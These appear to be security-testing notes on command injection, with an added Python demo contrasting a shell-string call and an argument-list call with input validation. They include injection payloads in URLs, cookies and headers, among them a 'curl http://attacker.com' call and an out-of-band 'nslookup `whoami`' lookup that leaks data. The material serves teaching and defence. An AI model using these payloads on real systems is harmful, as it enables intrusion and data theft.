Command Injections
Can occur anywhere, just like SQLi: URL parameters, form fields, HTTP headers, cookies, the Referer header, etc.
http://example.com/page.jsp?id=1; ping 10.11.122.34
Set-Cookie: sessionId=123; path=/; domain=example.com; & nslookup yfew.burpcollaborator.net
GET /index.jsp
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64)
Referer: http://example.com/page.jsp?id=1; curl http://attacker.com
Can also exist in submit-feedback, newsletter-subscription and contact-us forms, etc., for example when the server passes the input to a command like:
mail -s "user feedback" -a From:user@example.com
Using & ping -c5 127.0.0.1 & we can cause a delay of 5 seconds, so the injection can also be identified from the response time.
& nslookup `whoami`.burpcollaborator.net
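Added example (not from the original notes): the feedback mail call above built as a shell string, next to the same call built as an argument list with sender validation. `echo` stands in for `mail` so it runs offline; the function names, the regex and the harmless `echo INJECTED` marker are assumptions constructed for illustration.

```python
import re
import subprocess

MAILER = "echo"  # constructed stand-in for `mail`, so nothing is sent
# Assumed allow-list for the sender field; tighten to your own address policy.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# Constructed input: same "& <command>" shape as in the notes, harmless marker.
PAYLOAD = "user@example.com & echo INJECTED"


def run_shell_string(sender):
    """Vulnerable pattern: user input is concatenated into a shell command."""
    cmd = f'{MAILER} -s "user feedback" -a From:{sender}'
    done = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return done.stdout.splitlines()


def run_argv(sender):
    """No shell: every list element reaches the program as one literal argument."""
    argv = [MAILER, "-s", "user feedback", "-a", f"From:{sender}"]
    done = subprocess.run(argv, capture_output=True, text=True)
    return done.stdout.splitlines()


def send_feedback(sender):
    """Hardened handler: validate first, then call without a shell."""
    if not EMAIL_RE.fullmatch(sender):
        raise ValueError("rejected sender address")
    return run_argv(sender)


if __name__ == "__main__":
    # Two output lines: the shell split the input at "&" and ran a second command.
    print("shell string:", run_shell_string(PAYLOAD))
    # One output line: "&" is just text inside the From: argument.
    print("argv list:   ", run_argv(PAYLOAD))
    try:
        send_feedback(PAYLOAD)
    except ValueError as exc:
        print("hardened:    ", exc)
```

The `From:` prefix also keeps the value from being read as an option by the called program, since the argument never starts with `-`.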